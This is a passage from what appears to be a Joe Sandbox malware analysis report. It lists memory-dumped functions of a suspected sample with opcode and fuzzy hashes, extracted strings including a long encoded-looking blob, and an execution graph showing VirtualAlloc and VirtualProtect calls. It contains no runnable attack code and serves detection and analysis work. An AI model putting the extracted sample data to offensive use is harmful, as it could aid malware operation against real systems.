                                            Function 00007FFD9BF8DA92 Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c24348dce4a0113eb3f8d0403d566447ff971f60f39de83ba43ae9957b036a43
                                            • Instruction ID: 4832d3a8bed1c4432f7fcdc27db456e2bcacb0d4d62b86d1f1b299b472d3b6c2
                                            • Opcode Fuzzy Hash: c24348dce4a0113eb3f8d0403d566447ff971f60f39de83ba43ae9957b036a43
                                            • Instruction Fuzzy Hash: 5621FD35A1991D8FDF9CDF58C465AEDB7B1FF58310F1042AED04EE36A1CA35A9818B40
                                            Function 00007FFD9BF8C660 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4953d59dbf22b58e45518c886eee96626aea4b8b1899335478375e1420669514
                                            • Instruction ID: c24266f9db6413c23ee4aa006bca0e2ec8ebf3259675ee906fa69165f3e79214
                                            • Opcode Fuzzy Hash: 4953d59dbf22b58e45518c886eee96626aea4b8b1899335478375e1420669514
                                            • Instruction Fuzzy Hash: EA210532B49D0D8FE771AA9898645F97BE1EB4A350F05067BD04BD71A1DE762A058280
                                            Function 00007FFD9B875193 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dae3621c75a563b6b23292b4f470566f4b0b6cc93868aa46bb929b2c710da89b
                                            • Instruction ID: cd09ace25077e28070bdd786f5aba22ee8d85b8db86911dca4e41ec030ef5b78
                                            • Opcode Fuzzy Hash: dae3621c75a563b6b23292b4f470566f4b0b6cc93868aa46bb929b2c710da89b
                                            • Instruction Fuzzy Hash: 12318D35A1891D8FDF94EF14C865AEDB7B1FB64309F1001EA900EE3265DB719A818F41
                                            Function 00007FFD9BF8944F Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6948a98a71a2fcc4cd5b3c4c0641b7157ac9dfd6d262ad0176b05e01549a3ed
                                            • Instruction ID: f13393691c9e5ac2d01ef8d00cf157c34494f828f6060ccaef1e911cd24e35a7
                                            • Opcode Fuzzy Hash: e6948a98a71a2fcc4cd5b3c4c0641b7157ac9dfd6d262ad0176b05e01549a3ed
                                            • Instruction Fuzzy Hash: 10112771F4EE4D4FDB68ABA898615F8B7E0EF54310F05427AE10EC31E3DD2969018340
                                            Function 00007FFD9B871588 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8ae89fcc0530e363ef62b52a3fd32c6952c13d56ef2b93c5b49f4fa4a11903b
                                            • Instruction ID: a52387f53d619b8b02d47d3c55ef6ec13f2257f96492b934f1cff550ae523546
                                            • Opcode Fuzzy Hash: f8ae89fcc0530e363ef62b52a3fd32c6952c13d56ef2b93c5b49f4fa4a11903b
                                            • Instruction Fuzzy Hash: 35110831A0D69E8FE712FBB8CC505DA7B74EF46314F0946B3D051C71D2EA38621A8B51
                                            Function 00007FFD9BF88AC1 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba73a49be17fe01572dfa827e0880e17f7f90d7b5f0f1560c53053aaf3c5b70f
                                            • Instruction ID: c3a4254e037c0e685634530e2958a9da632a5432ef2f9bf2bb4dbdb8e7f7e476
                                            • Opcode Fuzzy Hash: ba73a49be17fe01572dfa827e0880e17f7f90d7b5f0f1560c53053aaf3c5b70f
                                            • Instruction Fuzzy Hash: 7C110092F8F98B86F2741AD018720BD6650AF80710F1A03B6D44F870F2DC2E2A451392
                                            Function 00007FFD9BF89F80 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4675a6e7b0695f881420c6120ae116f5734bc3601cd4033b1dee39ab60272f6f
                                            • Instruction ID: facc5a2027b58d8e671a311e2fd550017f69be385a64f17abfcf81fdb8958439
                                            • Opcode Fuzzy Hash: 4675a6e7b0695f881420c6120ae116f5734bc3601cd4033b1dee39ab60272f6f
                                            • Instruction Fuzzy Hash: 8B112320B49E0E8EDB69EF64D0218F9B7A0EF54350B00467AE04FC74E2DE39BA058380
                                            Function 00007FFD9B87070D Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 835591277a581c2f73975bb98be2473bc5fec79da643997b620010ca2ea47436
                                            • Instruction ID: d3a1891ecef41b35ab0c6a0eb510e719186e3de42f951f03bb6257872d1c90a5
                                            • Opcode Fuzzy Hash: 835591277a581c2f73975bb98be2473bc5fec79da643997b620010ca2ea47436
                                            • Instruction Fuzzy Hash: CC115130E2990E9FEB61EFE894596FD77E0FF18308F110476E41CC21A4DE3462949A41
                                            Function 00007FFD9BF89DFE Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e92cd38f045fbbd05d4aa0a4d7ed1a8a0b3c968f218eb5c731ece8018193ab03
                                            • Instruction ID: 5645a0ec1058733ce05f60fd8bc1583fb73527ad15a06799e239fa94c699d030
                                            • Opcode Fuzzy Hash: e92cd38f045fbbd05d4aa0a4d7ed1a8a0b3c968f218eb5c731ece8018193ab03
                                            • Instruction Fuzzy Hash: AC11883174A90B8FE7199F98D0246F47390EF50361F15427BE60AC71E1CB3A6650C340
                                            Function 00007FFD9BF832B8 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f66640d06aee6a246af652e86ff6b2e62ed8632c582d79b4c404eaa58c43d4f2
                                            • Instruction ID: a73401996a2f828229f5ba3e3762160b446216e3e26f0d43eadd7a0898046910
                                            • Opcode Fuzzy Hash: f66640d06aee6a246af652e86ff6b2e62ed8632c582d79b4c404eaa58c43d4f2
                                            • Instruction Fuzzy Hash: 1F012631F4AE4E4BEB705AA8446C1BD3BE1DF45340F06427AE10FE71A2DE7A2E018380
                                            Function 00007FFD9B871598 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 023979207256ad67a3c7b6936565280a81bc4a743b4c9602c964408cc76c8e3b
                                            • Instruction ID: b9fe5c693941ccc90cc8ac21bb64c7cf08edccef802b58b8f634a6869d42c819
                                            • Opcode Fuzzy Hash: 023979207256ad67a3c7b6936565280a81bc4a743b4c9602c964408cc76c8e3b
                                            • Instruction Fuzzy Hash: C311E531E0E69E8FD712ABA4CC505EA7B70EF06314F0946B3D011CB1E2DA386619C751
                                            Function 00007FFD9B8715A0 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c5f70e827ae2784f54c152a9a2fe9d2ad59bce73528cc5d647a45e2d0975c7f
                                            • Instruction ID: e4813ff30bfe161b2e737de2dec0c9c493802d56fe7c1481e7e14a5cd455fb8a
                                            • Opcode Fuzzy Hash: 2c5f70e827ae2784f54c152a9a2fe9d2ad59bce73528cc5d647a45e2d0975c7f
                                            • Instruction Fuzzy Hash: FF01D631E0E69A8FD712ABA4CC645EA7B70EF07314F0946B3D011CB1E6DE386619D751
                                            Function 00007FFD9BF86ACD Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3572acbffb13a20676d0f3f73cdb719bc2cd858fc210810b70436093db1e67a9
                                            • Instruction ID: b2e657e0b15f1c15fd90e00193afdcc1af44f2ef87366a27fd292956547d5ab1
                                            • Opcode Fuzzy Hash: 3572acbffb13a20676d0f3f73cdb719bc2cd858fc210810b70436093db1e67a9
                                            • Instruction Fuzzy Hash: 9DF0D652A0DE8E5BEB79AEE494654783B90EF14318F0603BAD04FC25F2EE29A9418741
                                            Function 00007FFD9B870730 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3375539a346a660b7b932a3ef5c442404f5779ff37bd1b5a2b76847e1fc7ed8
                                            • Instruction ID: d81712aa3ceb353c89097fa212ec008855ec4996899f34b9d7f044714bf5dd4d
                                            • Opcode Fuzzy Hash: e3375539a346a660b7b932a3ef5c442404f5779ff37bd1b5a2b76847e1fc7ed8
                                            • Instruction Fuzzy Hash: 4EF01C3091590E9FDB90EFA8C8596EE7BE0FF58305F01057AE81CC31A4DA34A6A4CB81
                                            Function 00007FFD9B871745 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed768af3df2160f2c1e68dda6e5cd2346509dbfe73115a53da3d831732c7b067
                                            • Instruction ID: ef70f553158ef598020485ee3f44da0cdc4f54b6223b3708c7e602f28c8ceae7
                                            • Opcode Fuzzy Hash: ed768af3df2160f2c1e68dda6e5cd2346509dbfe73115a53da3d831732c7b067
                                            • Instruction Fuzzy Hash: D0F03034A1950DDFDB64EF98E911AEE77A0FF04308F044075F42DC3195DA34A665DB91
                                            Function 00007FFD9B87CC31 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18a95837d0bd421119da94861537f1b9aa76191c69b3df1899daaf4c576dd0ef
                                            • Instruction ID: a8ccde80818b21f8b5233e3c6bdea16f262bd4264a52fc45ec7e442b8ffe3f32
                                            • Opcode Fuzzy Hash: 18a95837d0bd421119da94861537f1b9aa76191c69b3df1899daaf4c576dd0ef
                                            • Instruction Fuzzy Hash: 48F0FE70E1555E8AEBA4DF18D8A56FE67B1EF84344F0101F6901D931A6DE342E819B41
                                            Function 00007FFD9BF86B35 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8514f18b7d4287d08eeb341e3ecdcc859cb187a62ecc9017bfe696abb4618fbd
                                            • Instruction ID: 71e5153d2597dfac4698610f23f484bad3dc07776004a09231bbb2d2c5437e84
                                            • Opcode Fuzzy Hash: 8514f18b7d4287d08eeb341e3ecdcc859cb187a62ecc9017bfe696abb4618fbd
                                            • Instruction Fuzzy Hash: 67E09A3185EA8C9BD7B1DF9088660EC7B20BF00304F1602EBD50A060B2DB3667089642
                                            Function 00007FFD9BF89307 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88cfa4cd2f08af6fc0170455126590710650ed22c65bff7f5c0a1e6195d6fef0
                                            • Instruction ID: 2ad8e53447576435778d12f48f0340fcf56e19aed0b29dcfbf22cb1858baf23a
                                            • Opcode Fuzzy Hash: 88cfa4cd2f08af6fc0170455126590710650ed22c65bff7f5c0a1e6195d6fef0
                                            • Instruction Fuzzy Hash: FCE0C200B4EBCA8BEB360BF448780683B90CF073847061AFAD24B8B1F3D96939149311
                                            Function 00007FFD9BF89DDB Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                            • Instruction ID: 5ab250c317b92acfb5579ae7c69269a66de27e4118eae6e26b0b35335ff059a3
                                            • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                            • Instruction Fuzzy Hash: AED0C911B8FD0F86F6394EC181B923D11929F00300E62E23EC29F418E5CE3F7B41A606

                                            Non-executed Functions

                                            Function 00007FFD9BAC07C8 Relevance: 159.5, Strings: 116, Instructions: 14472COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2094493094.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bac0000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$OQt$$OQt$$OQt$$OQt$$OQt$$OQt$$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$k3K $k3K $k3K $k3K $k3K $k3K $l$m$n$o$p$q$r$s$t$tuZdtpj8WLLVz9Xr5/rZLrDuxVt+o8uLPosWynfUMvWmn1ASVLPV+LtpVuN3txqlTur63+UJElCiyDQCxG9acSLbGG8Bqkx0ulsrptOlvxdrPHW/1Fmf+XGhtekYROtZim$u$v$w$x$y$z${$|$}$~$ls)$ls)$ls)$ls)$ls)$ls)$oq$oq
                                            • API String ID: 0-4092454315
                                            • Opcode ID: fde21dd65844d9fa7ba36d87e538dc415b0bd323b6e7d5fd5ef37c58d8acb549
                                            • Instruction ID: 5f6cc3de822b8e941c8317a0436000499a1197681f896b6d4d2a247026764873
                                            • Opcode Fuzzy Hash: fde21dd65844d9fa7ba36d87e538dc415b0bd323b6e7d5fd5ef37c58d8acb549
                                            • Instruction Fuzzy Hash: 0764E770A1952D8FDB69EB28D8A5AA973F1FF58300F5041EAD10E97291DF396E81CF40
                                            Function 00007FFD9BAC07FA Relevance: 159.5, Strings: 116, Instructions: 14460COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2094493094.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bac0000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$OQt$$OQt$$OQt$$OQt$$OQt$$OQt$$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$k3K $k3K $k3K $k3K $k3K $k3K $l$m$n$o$p$q$r$s$t$tuZdtpj8WLLVz9Xr5/rZLrDuxVt+o8uLPosWynfUMvWmn1ASVLPV+LtpVuN3txqlTur63+UJElCiyDQCxG9acSLbGG8Bqkx0ulsrptOlvxdrPHW/1Fmf+XGhtekYROtZim$u$v$w$x$y$z${$|$}$~$ls)$ls)$ls)$ls)$ls)$ls)$oq$oq
                                            • API String ID: 0-4092454315
                                            • Opcode ID: 5121a6837a97d4e4384f3b0f0a96ab92f1b194483e9ed14c7cf371e694015485
                                            • Instruction ID: 33c4ef5034e851c584530af7cb4ba73904a7393a291bc8bdb7e5be8efdebce50
                                            • Opcode Fuzzy Hash: 5121a6837a97d4e4384f3b0f0a96ab92f1b194483e9ed14c7cf371e694015485
                                            • Instruction Fuzzy Hash: 5964F770A1952D8FDB69EB28D8A5AA973F1FF58300F5041EAD10E97291DF396E81CF40
                                            Function 00007FFD9BA30CFD Relevance: 3.0, Strings: 2, Instructions: 540COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 84_I$94_I
                                            • API String ID: 0-663626261
                                            • Opcode ID: 8c235c883a630638f43dd5aa43f109c0633a84a041987e694ba25fb2e44152f5
                                            • Instruction ID: d227492f4de742396270523a073d7b6ab1a5ee6794f7213db5624b5147c4e731
                                            • Opcode Fuzzy Hash: 8c235c883a630638f43dd5aa43f109c0633a84a041987e694ba25fb2e44152f5
                                            • Instruction Fuzzy Hash: 7D02EA96A0FBC11FE76607A818251655F91BB53BA035900FBD0C84B2FBBC9AAF069345
                                            Function 00007FFD9B871300 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "#0$#+0
                                            • API String ID: 0-2817361697
                                            • Opcode ID: 4b232bf2871518cfffbe6e1923fe61e0e1c1bca506112fcb06e0a345197675c0
                                            • Instruction ID: 63d1d826f488ccc743ca7591bd9f4140004e57c09616bd1a56c94d078c9c116c
                                            • Opcode Fuzzy Hash: 4b232bf2871518cfffbe6e1923fe61e0e1c1bca506112fcb06e0a345197675c0
                                            • Instruction Fuzzy Hash: E051D59BB1D07299E31E72FD79659ED6B48CF8523C70842B7E05DCB0D79C88208792E5
                                            Function 00007FFD9BA31DFA Relevance: 1.7, Strings: 1, Instructions: 433COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (4_I
                                            • API String ID: 0-1434692910
                                            • Opcode ID: a3111c46d1f29f866671446e7481cae77b0152ab79d38e0d17279c20f37d20eb
                                            • Instruction ID: 8038c689d6ccdd999c0a1a8dc369cb44a5cbc6fb9b78b849c2af3b59be3ca9a4
                                            • Opcode Fuzzy Hash: a3111c46d1f29f866671446e7481cae77b0152ab79d38e0d17279c20f37d20eb
                                            • Instruction Fuzzy Hash: 19D10783E0F7C21BF76647B828650A56F91BF537A071940FBD0D84B1FBBC89AD069281
                                            Function 00007FFD9BF80B1F Relevance: .5, Instructions: 543COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7ca29e9f4c42a147e4eb223bf46b08def7fbc48ab870a47ae693fbda23c2e75
                                            • Instruction ID: 412d927d71579f67deceb3faa1012a3c2d61eb04772a4be22280c836f0952a89
                                            • Opcode Fuzzy Hash: e7ca29e9f4c42a147e4eb223bf46b08def7fbc48ab870a47ae693fbda23c2e75
                                            • Instruction Fuzzy Hash: 34022863A0E6B28AE31A7BBCB9754E53B60DF0262C70902F7D0DD4F4E7EC5964469384
                                            Function 00007FFD9BA328D3 Relevance: .4, Instructions: 403COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 145e145b533669c074ddfbbb77292e26dd4367a4fe0210a2606dab3343a8cb2f
                                            • Instruction ID: b37de6e3a8cc1f1fceb94b8132d5913e97d60a986806d4ebc0d22024a4d910b4
                                            • Opcode Fuzzy Hash: 145e145b533669c074ddfbbb77292e26dd4367a4fe0210a2606dab3343a8cb2f
                                            • Instruction Fuzzy Hash: F9D1045290E2B39BD70AB778BDBA8E63F50DF0222C70C41F7E0AD4F0D7AC5961469295
                                            Function 00007FFD9BA2866D Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b4d2b08c9b238e62f9f43b9f91f1bbed12b88a2b5fd6dc3c23604a0acef8511
                                            • Instruction ID: 9d023f9bf32384ef11f1c75406da5600afa01d68a6cc961cf772473b3d69e901
                                            • Opcode Fuzzy Hash: 8b4d2b08c9b238e62f9f43b9f91f1bbed12b88a2b5fd6dc3c23604a0acef8511
                                            • Instruction Fuzzy Hash: 7931E570E09A1D8FCF84DF98C451AEDBBF1FB69300F2051AAD419E3291D775A941CB44

                                            Execution Graph

                                            Execution Coverage:4.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 17319 7ffd9b8c26fe 17320 7ffd9b8c270d VirtualProtect 17319->17320 17322 7ffd9b8c284d 17320->17322 17315 7ffd9b8c40ed 17316 7ffd9b8c410f VirtualAlloc 17315->17316 17318 7ffd9b8c4225 17316->17318

                                            Executed Functions

                                            Function 00007FFD9B8B1A35 Relevance: .3, Instructions: 340COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 331 7ffd9b8b1a35-7ffd9b8b1aa8 338 7ffd9b8b1aaa-7ffd9b8b1ad0 331->338 339 7ffd9b8b1b02-7ffd9b8b1b49 331->339 338->339 345 7ffd9b8b1b4b 339->345 346 7ffd9b8b1b50-7ffd9b8b1d26 call 7ffd9b8b0838 339->346 345->346 371 7ffd9b8b1d28-7ffd9b8b1d33 346->371 372 7ffd9b8b1d3b-7ffd9b8b1dbc 371->372 375 7ffd9b8b1dc5-7ffd9b8b1e2c 372->375 376 7ffd9b8b1dbe-7ffd9b8b1dc4 372->376 376->375
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4379575a46ba1dc417a8ecc844c794b88be42389313bbbe7a57f467fb4f457d4
                                            • Instruction ID: 6ff8db5724ea88a7aafc89b07f4edf47e0e835a655ce4ea6654df4bdeb2fc84c
                                            • Opcode Fuzzy Hash: 4379575a46ba1dc417a8ecc844c794b88be42389313bbbe7a57f467fb4f457d4
                                            • Instruction Fuzzy Hash: 8AC11471A19A9D8FE755DB6CD8657F87BE1FF19300F44027AC049DB2E6DA782802CB81
                                            Function 00007FFD9B8CBC71 Relevance: 1.8, Strings: 1, Instructions: 570COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
